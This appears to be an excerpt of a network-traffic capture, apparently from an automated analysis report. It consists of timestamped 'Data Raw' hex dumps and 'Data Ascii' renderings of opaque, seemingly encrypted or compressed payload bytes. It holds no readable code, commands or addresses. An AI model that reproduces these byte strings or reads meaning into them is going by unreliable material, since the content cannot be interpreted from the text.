                                                                                                                                                            2022-09-29 12:44:57 UTC2673INData Raw: 3f 8f a6 de 74 c2 6d 87 5c dc 07 2f 8b 7a c2 2e 50 6c 90 56 d3 35 aa d5 f6 3a a3 53 04 bc 81 a3 50 2e 19 ba 58 d6 52 78 d1 f7 9d 94 af b6 dc 75 0d 7c b9 99 0d c0 20 f6 14 30 19 25 69 e1 64 55 02 2f 57 85 45 22 27 6d 53 f7 df 40 b7 7a 4d 27 2f c5 27 86 9d ed d8 68 ca 93 7e ef 7e 7c 31 30 9b 5e a2 87 f2 5b 34 89 41 9b 4e a8 a1 80 d0 49 e2 bc c6 16 19 02 35 8e 67 cb 36 10 6b 25 41 b8 c1 7a 13 6b 46 4d 7d 31 c8 4b 3d 17 81 9c 45 d6 5c 0c 0e d8 34 26 b4 42 28 46 ad af 27 e4 bf e5 15 d1 c5 e8 fe 12 73 13 92 df ae 89 19 4e 72 ab 5e d5 93 25 ef 0d b4 da c8 08 4c ce 58 c2 82 46 a2 b2 ba 6f 7b 0e 90 76 a1 d6 3e a2 9f 89 f3 8c 5d c5 c3 9d 56 72 f8 2e 65 fa 5c 93 8f 06 4f 96 d9 03 69 8c 6d ef fa dc 8c e6 da f7 7f de 14 f0 8a b6 bf 78 6c 43 c3 a0 55 f9 5a cd f5 ab 92
                                                                                                                                                            Data Ascii: ?tm\/z.PlV5:SP.XRxu| 0%idU/WE"'mS@zM'/'h~~|10^[4ANI5g6k%AzkFM}1K=E\4&B(F'sNr^%LXFo{v>]Vr.e\OimxlCUZ
                                                                                                                                                            2022-09-29 12:44:57 UTC2689INData Raw: 67 69 f9 12 b6 f1 f2 f9 cf 82 01 01 b1 12 4d 6b 3b 04 f3 0c 9d f9 6c 59 b0 21 13 93 9e 0c 5b 67 ce 05 a1 b3 dc e5 9a f0 64 de 7e 84 9d 63 40 a4 9a 5b 10 e1 55 40 ef 67 c6 e6 4d 1d 88 e9 72 74 f8 25 d1 8e 36 c9 13 34 19 f7 ab 2d 98 17 5b 54 e0 ab 4d 41 09 8e 57 f3 97 dd 16 ae 6e 6f fb 6f 6f ff 13 d6 07 3a 00 91 92 4d 49 43 0e 1f 2a 2e d2 c5 8e 8c eb 94 22 ca 2d 40 57 7a c1 54 b7 f1 3d 1e f0 a5 09 ed dc 0d 53 0d 91 e5 61 2b b2 06 cf da 4e 34 47 a6 73 bd 62 f9 58 76 80 29 62 78 d8 a5 df 74 a9 a1 32 3e a9 13 bd 5e bf 75 15 a0 80 04 59 c7 61 4f a7 e2 01 29 5a 24 48 36 ee 65 fe ab de e5 86 b5 c8 cd 46 95 3b e9 35 80 97 3c d2 70 d7 b9 9b 8c c8 bd 4e bc 2f 77 c6 6a d2 38 71 66 fc 93 fe f2 e0 a9 c6 88 ea 38 aa d5 50 e5 e0 3b 16 2f 37 b6 23 a5 31 58 3b 5b f6 fb d0
                                                                                                                                                            Data Ascii: giMk;lY![gd~c@[U@gMrt%64-[TMAWnooo:MIC*."-@WzT=Sa+N4GsbXv)bxt2>^uYaO)Z$H6eF;5<pN/wj8qf8P;/7#1X;[
                                                                                                                                                            2022-09-29 12:44:57 UTC2705INData Raw: ef 45 40 36 36 a7 97 40 9a 53 cc f8 d8 dc 08 9f 0e 37 06 af 3f 66 78 67 fe 3c 2b 17 0b a4 87 6c 5c b6 b3 37 b2 d2 5f 3c e0 a3 6f b8 8f 4e 0a 3e 21 0d 1c 2c 0f d9 6d 5d 28 a3 e2 28 89 83 3a b5 b9 a7 1d 55 5e ec 71 9f e6 7b 0f 72 ab 4f e2 52 a6 b8 01 9e 5f cb 37 d6 7b 95 c3 82 ac fe 55 73 46 b8 0b eb c8 31 a8 36 59 4d f4 c1 fc 6d 53 71 8c ba d7 b4 42 ce 96 1a 83 77 37 04 f8 8e d8 dd a7 a7 be 94 17 aa ac 61 2d 8f 5b cf 54 64 ef 18 b8 55 dd b7 58 b5 bf e0 b6 da 6b d6 d4 c8 96 17 48 4a 72 07 e4 07 66 18 0e 7c 5b 19 3a 2a a7 05 e8 27 f4 2c e3 d0 91 f6 37 db 72 de 32 1f 37 82 53 2b 8d 7d b7 d5 64 7c 3e 7e 45 ef ef 77 80 44 e3 8f 80 c3 22 74 dd 52 bc 8d 43 2b ef 86 8f e5 74 de 18 78 6a 84 a1 f8 86 99 d0 74 c6 41 24 e1 e9 ff fe 45 e5 85 d6 dd 8a e8 eb b5 12 a1 39
                                                                                                                                                            Data Ascii: E@66@S7?fxg<+l\7_<oN>!,m]((:U^q{rOR_7{UsF16YMmSqBw7a-[TdUXkHJrf|[:*',7r27S+}d|>~EwD"tRC+txjtA$E9
                                                                                                                                                            2022-09-29 12:44:57 UTC2721INData Raw: 48 05 9f d5 66 2f 71 6b 58 23 a4 82 b5 c1 06 b7 8e da a9 86 3c 9c ec 50 7a 72 4c 89 49 47 36 8f a6 21 e8 9c 40 eb 7d 5a 17 f1 55 14 11 57 9c 1a 3c 59 61 84 59 57 e4 d9 af 33 2f 1f 8b 85 23 e7 3c 48 4d f3 eb 90 b7 48 4f 10 3b f5 b3 5e 76 e4 63 ad 33 51 e6 97 d0 9e 12 b2 27 25 92 45 5b 03 52 85 5a 38 4c 0a b5 31 cb eb 27 0b 09 d7 17 1b 21 32 a2 95 f8 65 a9 12 09 08 60 e6 b8 36 ce db 4c 40 31 36 68 3c 84 41 00 0f 68 91 b2 2c e2 b6 e7 88 b6 b7 c2 5a 46 dd 4e 1a 0f 66 13 fc 95 2a c8 fe 63 a6 6c 75 b7 72 67 29 c2 57 5f ad ac 62 a7 0b 58 6d 8e 4a 30 42 51 26 bd 3a cf 35 d0 bd be d4 94 1e 4f 86 23 52 6f 13 11 60 82 c0 82 65 b9 72 dc c1 88 1b c4 ff 66 34 41 8c 35 ec aa 46 5e 28 3c 7b 38 3a ab 64 95 0d 59 4f df d3 ce d7 fb e4 6a c5 15 fd ec 0f 92 22 77 77 5d cf 9e
                                                                                                                                                            Data Ascii: Hf/qkX#<PzrLIG6!@}ZUW<YaYW3/#<HMHO;^vc3Q'%E[RZ8L1'!2e`6L@16h<Ah,ZFNf*clurg)W_bXmJ0BQ&:5O#Ro`erf4A5F^(<{8:dYOj"ww]
                                                                                                                                                            2022-09-29 12:44:57 UTC2737INData Raw: a7 81 0c ed f3 ad d4 c6 f9 58 ab 6e fc 04 92 82 63 20 1f f9 a2 b1 1e 24 f2 28 fd 6b 72 fb 83 f6 e5 c4 07 26 38 c7 ce aa 61 80 9b ad 31 3b 22 e3 16 0c 80 4d 4e a7 5a 84 37 c3 3b 07 44 60 a2 76 d1 0d 8a dc fe 8e 86 59 68 f5 54 21 ed 9c 02 80 d4 52 ab f2 94 cd 06 b6 0e f3 86 df 36 a4 fc 39 39 43 59 81 16 07 e0 f2 74 3c 21 14 0a d5 24 fc 76 6e 16 b0 d2 62 0f 8b 19 71 97 29 45 37 b0 38 dc cb 3a 84 db 5d c9 4e f1 74 fc 97 3b 1c a6 c9 6b 24 f3 ca 92 bc 12 f9 5a 09 12 ff 56 75 63 b6 7d 4a 8e 58 ca c9 78 d6 da 87 7d 2b 0c 29 a6 ae 0e 65 f5 f2 21 69 a1 4c d9 b1 6f ba bd b3 eb 2a d7 38 3c 60 20 fd 3d 75 2e 8c d4 de b3 48 f3 2e cf 00 95 db dd 1f 81 e6 dc 82 e2 c3 87 79 54 8f 8a 8c f5 9f aa c0 be 41 8a 58 79 7c 17 0e c4 71 0e 14 92 fa d6 1c be 2a ed 59 e9 c1 ec 39 47
                                                                                                                                                            Data Ascii: Xnc $(kr&8a1;"MNZ7;D`vYhT!R699CYt<!$vnbq)E78:]Nt;k$ZVuc}JXx}+)e!iLo*8<` =u.H.yTAXy|q*Y9G
                                                                                                                                                            2022-09-29 12:44:57 UTC2753INData Raw: b3 91 c6 d6 9d da d1 92 50 87 93 85 05 0e b4 f8 38 bd 60 5f 45 51 a8 06 16 34 6a 40 5e c8 00 6f fa 37 05 2a f4 52 04 30 2d 3a 14 93 8b 2d d8 2c 5a 99 6a b5 49 69 ca 59 0d f6 24 d7 36 ab 9c 8a 00 09 8f f9 5e de 80 07 38 04 06 82 54 12 72 89 1e e2 b6 2b 89 4b 25 4f 9a c6 de 2f 41 b0 64 ad f0 20 ce 15 38 2c 95 d6 0d a6 55 19 1a 5f ec e3 1b b9 b1 2e 15 a0 0e 12 f4 c1 87 f1 54 70 df d3 06 a3 3f 6b 2f 64 22 19 da 53 17 99 64 44 0d c2 77 0b f0 46 8a 2e 7f 89 0d a1 b1 4d 6d 9d b0 92 85 0b b3 b8 fb af eb 19 17 3a dc 66 e2 7f be 49 3f 99 b9 e4 db 38 cd 21 a8 2d 66 67 39 ed d3 8d bf 66 b2 ea eb 21 e7 12 a2 7e 97 4c 1e 59 77 64 fa 7b f3 de b1 b7 5b da 7e 86 4f c4 22 2d e7 fc 50 ae bd db 37 3f 7c 63 91 f0 d1 35 c1 7f e6 81 91 d3 2a 52 83 12 cd f1 7e 47 ba 87 2e eb 2c
                                                                                                                                                            Data Ascii: P8`_EQ4j@^o7*R0-:-,ZjIiY$6^8Tr+K%O/Ad 8,U_.Tp?k/d"SdDwF.Mm:fI?8!-fg9f!~LYwd{[~O"-P7?|c5*R~G.,
                                                                                                                                                            2022-09-29 12:44:57 UTC2762INData Raw: cb e2 5a a4 dc 54 a8 d4 6f 2d fa f4 1b 76 94 2a 10 e1 42 2d 0c 9f dd b8 c1 f7 2d ab a9 df 08 34 0f cb 2a a5 ba d1 37 03 ee 4a e2 19 5c bf a6 78 6e 1d f7 4b fd 45 16 68 26 c9 bf 4c e6 a6 ae 92 b3 2c 59 19 0f d1 9b 86 ca 41 96 f4 00 4d eb a7 31 4d 78 4c e9 a9 a6 b8 1b ac be ce 5a eb a7 f9 90 92 e5 1b 45 48 4e 7e 28 cb ca 31 53 eb 4d 30 16 ee e2 63 7f c1 8d a4 ae 7c 60 c6 b7 c7 a3 c1 cb 7e 18 57 bd bd f2 67 c6 22 52 49 16 3d 02 eb 5d 50 5c 9a 53 01 fc 44 fc eb 4b 5e f6 96 93 8a 44 e6 2f b9 0e f8 83 81 07 b0 b2 63 8e 21 21 54 85 02 b8 2d 43 2b 27 64 1d 05 33 f7 13 fe 13 b4 66 dc 93 ba 04 ab 63 0a 4a 5e b4 20 16 b0 c6 54 9c a7 5d f7 5c 45 33 22 8e 42 df 09 f8 b5 c9 16 46 ed 3a 4f 09 d8 60 7d 23 bb bd 42 7c b6 cb d6 68 09 fd 6f 14 a8 e8 00 c3 58 50 fd f1 96 30
                                                                                                                                                            Data Ascii: ZTo-v*B--4*7J\xnKEh&L,YAM1MxLZEHN~(1SM0c|`~Wg"RI=]P\SDK^D/c!!T-C+'d3fcJ^ T]\E3"BF:O`}#B|hoXP0
                                                                                                                                                            2022-09-29 12:44:57 UTC2778INData Raw: 7c f4 bd 2f 60 d2 a6 92 b3 bd 68 af 85 45 31 3f b3 5f 45 de 79 23 ab ed a6 53 97 05 a6 af 4f a6 8a df f1 39 4a 02 06 35 de 27 81 6a 1f b9 67 81 e7 ba 77 7d fa 55 f7 d7 1d 4a 78 8b 32 21 e4 dc f6 6a 09 8d c1 de 92 1e d1 44 9f ce 0c 71 0b 0f c9 f6 40 e8 3b a9 33 0f 7c 99 87 ce fc 61 82 7e 06 f3 09 33 65 39 b3 68 75 12 76 a6 5f b8 ef ff d9 41 b3 db fd b2 c1 52 c9 d3 e0 e5 0d ab 7b 96 c0 61 e6 c4 ac c7 d6 b4 42 52 55 cf 27 07 67 20 6f 87 ca 6c 7f 8d 8d 96 14 59 a1 de 53 56 18 69 7a 22 18 3b 7e 68 91 76 6c 66 d1 23 d1 a3 5e 54 19 4f 2b e4 df 26 87 f3 0b 05 4b 7d c6 ee 2f 55 9c 12 fd f9 9c 69 ed ce c6 8d 01 10 7e e3 74 83 55 13 a9 e4 6c 0e 79 07 18 24 94 50 19 17 e2 e1 84 2e d8 a4 7a bc b5 1c ad 62 06 b2 ef 41 03 e2 59 40 30 24 a2 e8 b1 8e 05 98 57 e0 6c aa 75
                                                                                                                                                            Data Ascii: |/`hE1?_Ey#SO9J5'jgw}UJx2!jDq@;3|a~3e9huv_AR{aBRU'g olYSViz";~hvlf#^TO+&K}/Ui~tUly$P.zbAY@0$Wlu
                                                                                                                                                            2022-09-29 12:44:57 UTC2794INData Raw: 5f c5 86 4c e1 ab bd 7f e7 37 27 f1 80 ee 36 6b b2 18 be 92 87 a0 b6 6c 6b 6b 4a 50 52 48 da e7 84 cb 1f e0 b4 dc 22 43 d1 b6 3a 38 c3 b0 74 15 50 a9 aa f3 8e 31 d8 1c 0e 3c e7 46 56 c1 b2 a4 66 98 56 c9 30 4d 65 9b 00 91 1a bf d8 3e d6 a9 4a 8b 40 67 a1 d8 2f 40 98 3f b3 d5 7b 42 44 b1 50 a8 a0 fa f2 38 f6 0f cd c8 60 7a 0b ba ac 93 5c c1 36 d0 3a c4 8b e2 cc b9 6b 2f cd 76 e3 a8 15 7a 64 e4 3f 8a 89 22 d4 d2 df af cb 42 24 2b 81 19 61 19 d0 a5 21 f3 59 67 ef e2 26 b0 49 77 99 b3 00 83 73 2c 66 b8 e0 31 a6 68 f7 f5 65 b9 72 d0 47 11 95 e8 76 ae 41 33 a1 43 8e f1 c7 dd 2d d4 c1 b7 7e 82 0b fc b2 83 7f 74 3c 99 f7 77 c5 80 93 8f c5 75 c9 14 18 aa 6a da 17 68 b4 86 f3 5e 7c 2b 79 f5 1a c9 f2 96 7c 40 39 87 69 42 88 09 93 e4 63 e1 93 80 59 0e 4a ee fd 39 23
                                                                                                                                                            Data Ascii: _L7'6klkkJPRH"C:8tP1<FVfV0Me>J@g/@?{BDP8`z\6:k/vzd?"B$+a!Yg&Iws,f1herGvA3C-~t<wujh^|+y|@9iBcYJ9#
                                                                                                                                                            2022-09-29 12:44:57 UTC2810INData Raw: b0 2b 01 e0 a9 da 06 c5 fd 53 07 a4 a3 77 24 5c e1 64 dc 06 4a f5 66 98 bf 10 93 53 33 71 fb 00 a0 52 09 c1 4c 71 94 f2 68 03 00 32 10 25 37 97 96 3d 38 e8 6f e2 be d3 08 72 10 3a 72 92 3e 7e 19 5c 5a 88 53 35 92 76 5e 5f 8f db 38 79 c5 bf ee 66 34 a5 6b 08 89 bc b4 40 f7 17 25 40 c4 87 5c f2 94 7d 41 fb b1 97 a9 87 69 b9 f4 8e f6 a8 a0 ae 7b 3a 10 45 a3 63 9b dc d7 c1 14 ad 28 e8 92 0d f5 20 7a 44 ae 25 bf 55 fd b1 15 ec 27 1d 79 11 ed 04 17 45 6e 2a 32 74 8d 2b 92 b5 16 72 c9 87 da 7d 82 c1 39 49 d4 9e 93 73 2f dc a2 57 c3 47 47 f3 5d 62 1d d4 01 96 99 b4 28 7b 49 3a 21 02 21 5b 09 1b 6b 3b 3c 76 73 53 58 22 8e 5e a9 67 c1 6a 72 e2 cd 2a 47 72 da b6 36 03 d8 ff a5 4b 32 bb 9f 35 8e d0 60 d6 07 77 fa 79 91 ef b5 b8 c6 e0 79 80 28 40 a1 87 70 ef 5b 52 12
                                                                                                                                                            Data Ascii: +Sw$\dJfS3qRLqh2%7=8or:r>~\ZS5v^_8yf4k@%@\}Ai{:Ec( zD%U'yEn*2t+r}9Is/WGG]b({I:!![k;<vsSX"^gjr*Gr6K25`wyy(@p[R
                                                                                                                                                            2022-09-29 12:44:57 UTC2826INData Raw: fb b2 f0 e4 3f 8d fa 80 5b 86 7b 3c 8a 4e 44 ed d6 d8 1f e3 e7 af 01 22 a1 12 d0 22 f0 cc 08 10 44 d8 fd 74 04 f4 a2 05 7c 6c 77 46 fb b5 7c e0 31 01 8e 73 ab 5c 3c 36 ee 9c 6c 2d 24 35 e1 72 33 6d d2 ee 32 34 bb 3b a2 29 68 97 43 62 10 d6 13 4c a1 ce c9 bb bb 75 5c 5a 42 dd 04 1e 35 d5 11 ec 33 00 3f 48 bf f1 3b 96 c6 6c 5b 5c 9c 00 1f 65 94 3f 6d f2 9a f7 d3 a1 c8 cc 4a 13 4f 0a e9 43 cd 0d ff e8 f1 7e d4 e6 f2 3f 3f 83 5b 52 7b 78 f5 2f 18 44 d2 b8 1b a6 81 fd e1 99 27 26 f6 4f 86 1c e3 ea df 97 01 b6 a3 f0 6d 67 f2 8b ab 3a 69 0f 53 92 cb 87 d4 59 0a 01 7a b9 a4 0a 38 54 7d 49 52 45 a9 73 3a d8 cc 8c 5d a6 cb fc df 8d 76 47 4e a2 cc 0d a5 9d cf cf 8e 81 01 6e 15 c1 f9 36 83 63 1d 3f 2f 32 d7 b9 c0 ee 71 95 51 92 b7 70 0e 7f 41 49 7b 74 5b 77 29 da 4b
                                                                                                                                                            Data Ascii: ?[{<ND""Dt|lwF|1s\<6l-$5r3m24;)hCbLu\ZB53?H;l[\e?mJOC~??[R{x/D'&Omg:iSYz8T}IREs:]vGNn6c?/2qQpAI{t[w)K
                                                                                                                                                            2022-09-29 12:44:57 UTC2842INData Raw: a0 01 85 d2 93 72 2a 8b 3c 1e 62 fa c6 bb 26 c0 a1 33 64 94 08 8e cb bd e4 2c d5 8f f2 f0 1a e4 9d f7 d6 78 26 6e 1b bb 17 b3 89 a4 39 b1 28 5b 56 df ee be 05 43 8a 98 68 22 23 d4 f5 c5 82 5e 51 77 ba 5c 51 0e 65 6d 56 29 e9 20 2a 3b 17 bb 71 b9 ad b7 f6 a5 34 6b a5 71 09 57 3c 8d 87 92 21 4a ae cc 59 38 82 53 57 50 e9 f8 45 ee be 7e c4 6b e7 3b 7b 25 4e c1 da f3 9f bb 11 57 79 ac 72 73 74 f3 2a a6 61 c2 5a 0f b1 26 a8 a4 3c fc a3 f2 41 4c 66 ef ba b3 70 6c 1e 85 79 dc 3a 05 02 91 d2 11 cc 07 e1 ad 94 c5 94 b9 e4 83 5b 50 f4 82 42 e9 91 f4 75 44 53 27 ff 5d a8 5e b7 bc 97 7d f1 7a ff b8 67 79 61 94 0b b9 a3 ca 89 e0 f2 c3 3a a9 68 ff 21 32 7c 97 cf 21 db 26 36 0f 84 d7 ff dc 38 22 2f 4f 3e 6a 64 f4 1f 63 da d2 78 13 1a 8c c4 a0 62 c8 db 22 c8 39 f8 be ff
                                                                                                                                                            Data Ascii: r*<b&3d,x&n9([VCh"#^Qw\QemV) *;q4kqW<!JY8SWPE~k;{%NWyrst*aZ&<ALfply:[PBuDS']^}zgya:h!2|!&68"/O>jdcxb"9
                                                                                                                                                            2022-09-29 12:44:57 UTC2858INData Raw: eb 94 98 05 ba b0 22 f7 61 0f 76 25 ee 00 92 8c 0a 55 c8 7f 60 1e 06 a8 0f b6 ff 0c 80 3b 1a 9e d6 d9 d6 ec 45 80 be 84 8d 32 82 d8 b9 25 ef 01 3a 0e db fd bf c3 fb 50 2d 7c a7 da 3b f1 0e eb ab 7a af f3 c6 c8 38 81 fc 63 c7 dc 1c 60 d7 ee 30 ea 7f ab 4c ed c3 0a b0 2b 2b 8a c9 48 51 5b d5 3f f9 ea 8a 02 96 1f 27 da 9a a7 8d 3d 83 33 e3 d9 64 0b 80 7a 17 80 59 b3 8a 5f 9f d1 42 35 6c f1 d0 50 33 5a bd 14 66 a2 39 5d fb 34 a2 a7 b5 19 4c cd bc 72 d0 8b 7e fa 0f ab 6d 95 a7 75 34 2f cc 0c 85 14 95 04 5a bf ba a2 5f c9 2e 16 16 f5 6a c2 e7 e4 93 1a 45 0d 78 13 19 42 ba 98 62 c0 15 f3 45 9d 08 81 78 d8 77 64 6c 34 ca 3f 35 48 4b 09 01 5c 29 65 2e 6f c7 b0 db 71 fc 07 55 b3 30 36 54 84 f5 ed c4 f3 6d 4f 10 15 14 35 43 71 6b 28 4d 07 fb 46 0a 37 b0 fe b7 d6 af
                                                                                                                                                            Data Ascii: "av%U`;E2%:P-|;z8c`0L++HQ[?'=3dzY_B5lP3Zf9]4Lr~mu4/Z_.jExBbExwdl4?5HK\)e.oqU06TmO5Cqk(MF7
                                                                                                                                                            2022-09-29 12:44:57 UTC2874INData Raw: 9d b1 38 57 0f cc f6 3e a9 64 5e 1e 7a 92 a1 8a bc 1f 66 1d 31 00 be 3d 7e 18 0d 2f 05 d5 99 34 59 ea ed ad a8 30 6a 24 df 91 54 c7 62 cc 25 57 38 fb dc 6f 1c 86 2c 64 23 3b 38 1c fb e9 ed 0e 2d 9e 2f 70 ec 64 87 3c 6e 89 4b e9 f9 6a 9a 98 b1 09 be c9 72 72 d0 11 36 49 1c 6e 24 08 c5 45 4c f6 34 32 ae f8 3e 4c eb 54 df 14 29 3a 57 95 48 5c 5d 10 70 25 b2 3b ff 81 81 1b e7 63 33 1b e4 bd ea ae db 99 99 99 29 43 aa c8 fc eb f6 00 63 39 84 3a e7 5c 43 43 c2 6b 3f dc 8d d8 0f a6 5c b2 0b fb aa 6d f3 06 1a 0b 64 6f ef 3e 87 09 f0 97 bc 15 30 86 e3 d4 76 91 63 47 48 f3 80 28 12 56 8a 35 e0 d0 5f a6 5b 4f 73 e9 f8 6e e8 6a ca d5 9f a1 ee e6 6e d6 74 13 9c 02 a1 42 7b 07 cf 8f 80 d4 08 6e 6e e2 a1 92 75 af 22 fc 55 79 73 bd 5a c4 ce 66 c2 9e 43 e2 82 69 ce 82 ae
                                                                                                                                                            Data Ascii: 8W>d^zf1=~/4Y0j$Tb%W8o,d#;8-/pd<nKjrr6In$EL42>LT):WH\]p%;c3)Cc9:\CCk?\mdo>0vcGH(V5_[OsnjntB{nnu"UysZfCi
                                                                                                                                                            2022-09-29 12:44:57 UTC2890INData Raw: 98 0f a2 eb 62 d3 47 95 27 19 be 34 27 aa f8 88 58 fc 24 bc 2b 11 48 36 4c 54 1d da 5f 3a 2a b2 6f 46 3c b3 37 1a 4c 2d b7 f0 22 8c 7d 32 0d a0 d9 1d c8 51 90 0f 4f c2 5d 0a 2a f9 4e ce 35 ec ea ea bb 98 9c 13 c6 49 dc a0 ff 3f ed 2a 3c 45 69 00 19 de ac 12 f0 57 4f ab fd 8d 6a f7 55 dd 28 42 f2 52 ca 57 b4 38 4c e8 30 0f ef 09 d8 f0 8f 6f 59 ec 90 68 86 a4 96 71 88 2a dc d1 fa 8b a6 a6 64 95 f0 a8 64 ba 5c 4b 94 21 29 c7 5d f2 f6 c7 d8 ff 14 13 29 77 0f 15 cf 0d 64 2b 87 5a 05 2e 43 da 6c 1b 88 cc c1 a6 16 f0 bc 01 3d 58 8e 52 ac b1 b3 c3 ac 87 fe 0e ad e9 bc ca 16 9c f3 3f 15 bd 71 80 1d 88 22 ad 9e 5c 1a 78 02 cb 45 5f 46 09 7b 65 8e ff 69 8e 67 c8 6b 12 b6 07 c8 ec a4 b0 ae d0 0b 94 3f b2 69 8e 83 3f f2 b2 ff 2a 66 23 2d 6d fd 53 f2 93 9d c9 f9 c4 3b
                                                                                                                                                            Data Ascii: bG'4'X$+H6LT_:*oF<7L-"}2QO]*N5I?*<EiWOjU(BRW8L0oYhq*dd\K!)])wd+Z.Cl=XR?q"\xE_F{eigk?i?*f#-mS;
                                                                                                                                                            2022-09-29 12:44:57 UTC2906INData Raw: 08 c5 f9 3c 48 c3 41 92 3c 7b bb 06 2b 38 9f 42 68 e1 82 f8 5a 71 db df 59 62 a3 d5 c2 e7 52 27 19 5f a6 af b9 55 99 64 17 74 73 0b f7 ab 40 d3 41 38 db 30 84 1d d7 f0 11 67 af 4b 18 f5 7d 7a 9b 18 f1 e9 38 3f 98 0a 03 a0 af 0f f9 e7 9b 31 f5 39 6a c0 a1 a1 bf 88 fd c9 1a ea 1c 43 7a 6b f3 11 b1 38 e3 86 91 85 15 a3 df 7c 68 13 41 04 97 63 bd 0e c2 f5 7a 08 91 51 41 23 58 c5 b8 4a ef a4 4b 02 c9 bb a4 28 ad 95 04 46 cf 75 3f fd b0 d3 11 d6 b5 16 d3 8e 7a 2a 71 c9 52 c6 a3 4f 84 eb 38 cc 83 28 cf 3b 60 24 d5 a8 72 42 f1 e4 b6 cc a8 37 22 7c 69 46 fc 93 68 45 65 38 07 f1 8a 09 d3 4d 1e dc 68 c3 c1 fe 2e cb c5 5f 21 35 10 5e 02 af 80 6f 0c 7c 9b 0e 43 e2 47 b8 84 f3 8f 92 88 11 b1 2e 0c 7c ec 97 7f 2f c7 d5 08 16 8a 28 8e 83 3e e0 d7 df 58 04 59 4a 1f be 32
                                                                                                                                                            Data Ascii: <HA<{+8BhZqYbR'_Udts@A80gK}z8?19jCzk8|hAczQA#XJK(Fu?z*qRO8(;`$rB7"|iFhEe8Mh._!5^o|CG.|/(>XYJ2
                                                                                                                                                            2022-09-29 12:44:57 UTC2922INData Raw: 98 37 50 59 32 26 23 3a b3 b2 be 3e 56 d6 c2 38 0e 99 ed 03 81 c3 2f 93 ce c2 55 02 6b 8c 43 dc d1 9f ff 6c 92 32 24 3c b8 47 3d 90 8e d8 17 2e d3 a7 7e 09 f1 c2 c4 5f f2 24 5f 4b b7 0f 15 f8 81 8e 2c de ad 7e 57 91 78 75 da 59 d6 20 3b bf b4 21 0f b0 15 c7 4b 3b 15 62 be a8 6f 6b 10 83 7a 01 bd 24 3a 92 78 e7 93 14 bb d5 aa 20 77 c2 3a e3 37 05 6b 6a 3f e9 69 64 92 31 97 13 19 c4 8a 65 3d 36 cb 6c 59 f0 1c 8d 4c 7c fc 9d 4d f5 84 35 8e 90 03 81 17 f4 c8 18 10 38 1d 96 47 8c c8 83 f8 e8 85 8f 95 04 31 4a 8d 3e bc 6e ff 9b 95 b2 d4 28 49 53 f8 1f 98 18 d6 b4 67 ef 7f 21 a5 cd a6 08 c5 9b 3c 5d 72 88 46 e9 dc 44 ed 2b 19 49 16 b2 5e c4 67 54 e6 91 c6 39 62 82 a0 44 60 a4 1c 0e d4 45 d6 ff dd 15 49 d7 27 86 18 dd 98 e4 76 6e 9f 66 da c6 8a 50 4b cc f1 5a 42
                                                                                                                                                            Data Ascii: 7PY2&#:>V8/UkCl2$<G=.~_$_K,~WxuY ;!K;bokz$:x w:7kj?id1e=6lYL|M58G1J>n(ISg!<]rFD+I^gT9bD`EI'vnfPKZB
                                                                                                                                                            2022-09-29 12:44:57 UTC2938INData Raw: c5 2e 6e bb 20 e3 26 a5 ee 6c 23 4b 4a 8e 73 ba 02 19 e7 df 4d da dd 4f 24 fd 8f a0 0d 36 6e c5 11 95 60 4a 4d f4 d4 b1 d1 ec e8 a7 61 3b af 41 2d a3 06 bc 5b 72 ee bb d7 c2 5e b6 19 a7 c5 6e b3 93 c5 86 51 cc 21 da 53 75 58 1a 6b f6 1b 18 e8 fd 65 f4 37 98 50 5a c8 fc 84 2a 5c 2c a9 ee 18 8c 58 68 7d 3e c2 27 2c 24 2c 4d 25 63 3d f7 8d c1 cb 2d 28 5f 47 eb 14 f1 96 ab 82 f4 ca ca 97 22 76 7f a2 7c a6 67 b1 13 25 04 17 44 fb 1c e1 75 f8 03 87 05 4d b8 e5 07 55 56 6b 47 b4 94 0f 58 60 2d 20 80 4b f2 1e f4 eb 4f 43 3f 98 9e d5 65 6c 03 d1 90 67 78 52 a2 ac 2a af 0f bb ec 36 5e a9 2b ff f9 39 b0 01 60 34 b8 61 68 0f 1e 42 d4 fc fa 88 4f 17 2e 5e 57 f1 91 52 96 f7 96 70 07 9a 53 65 3a bd 46 77 9f 6e ff f8 14 29 fe 91 2e 76 c2 00 44 92 70 eb 99 7b ba e5 5c 02
                                                                                                                                                            Data Ascii: .n &l#KJsMO$6n`JMa;A-[r^nQ!SuXke7PZ*\,Xh}>',$,M%c=-(_G"v|g%DuMUVkGX`- KOC?elgxR*6^+9`4ahBO.^WRpSe:Fwn).vDp{\
                                                                                                                                                            2022-09-29 12:44:57 UTC2954INData Raw: 0a 28 43 e4 cd 04 e8 1f 31 93 d5 f4 b3 c1 dd 4d 23 51 4f 24 c8 82 6a 0d 80 a9 53 eb 20 ab 04 ab ea 68 d1 1e db e1 3b c3 c1 95 0c 6c a8 b6 22 fa 5c 15 12 05 79 93 52 d1 7e 0b f2 54 aa e1 dc af 87 77 68 83 b0 00 12 89 dc 51 7d 11 bc 91 4f 3b a1 d2 7d 4e 1f a4 c4 ec 4f 6f af 51 fe b5 16 a8 15 f7 24 7f 79 b3 14 d3 e2 82 a5 65 e5 26 91 00 28 4a 95 29 cf 54 02 6e e2 06 66 66 5b bb 4d 16 29 92 6f 23 13 be 50 6f 41 1e 81 aa 83 1b 36 50 da 96 e3 6d 2b b6 0e 03 e6 00 e9 51 68 94 6b db 33 1f bf ce 81 86 03 bd 15 d8 13 f8 28 3f 3b 98 93 c3 12 4b 66 bf 12 1f e4 c8 52 81 aa 34 77 77 cd 96 e1 aa d4 b1 7c 47 83 0f a1 73 a2 df 77 66 b4 33 8c 3f 8b 5c 95 b0 ba 4c f7 e1 b9 2d 6e cf a7 13 eb d1 e1 42 7f 20 3d 5c 5c e0 52 45 e8 d9 c2 f8 97 6b cb 6d a8 47 92 53 92 e3 41 8e e1
                                                                                                                                                            Data Ascii: (C1M#QO$jS h;l"\yR~TwhQ}O;}NOoQ$ye&(J)Tnff[M)o#PoA6Pm+Qhk3(?;KfR4ww|Gswf3?\L-nB =\\REkmGSA
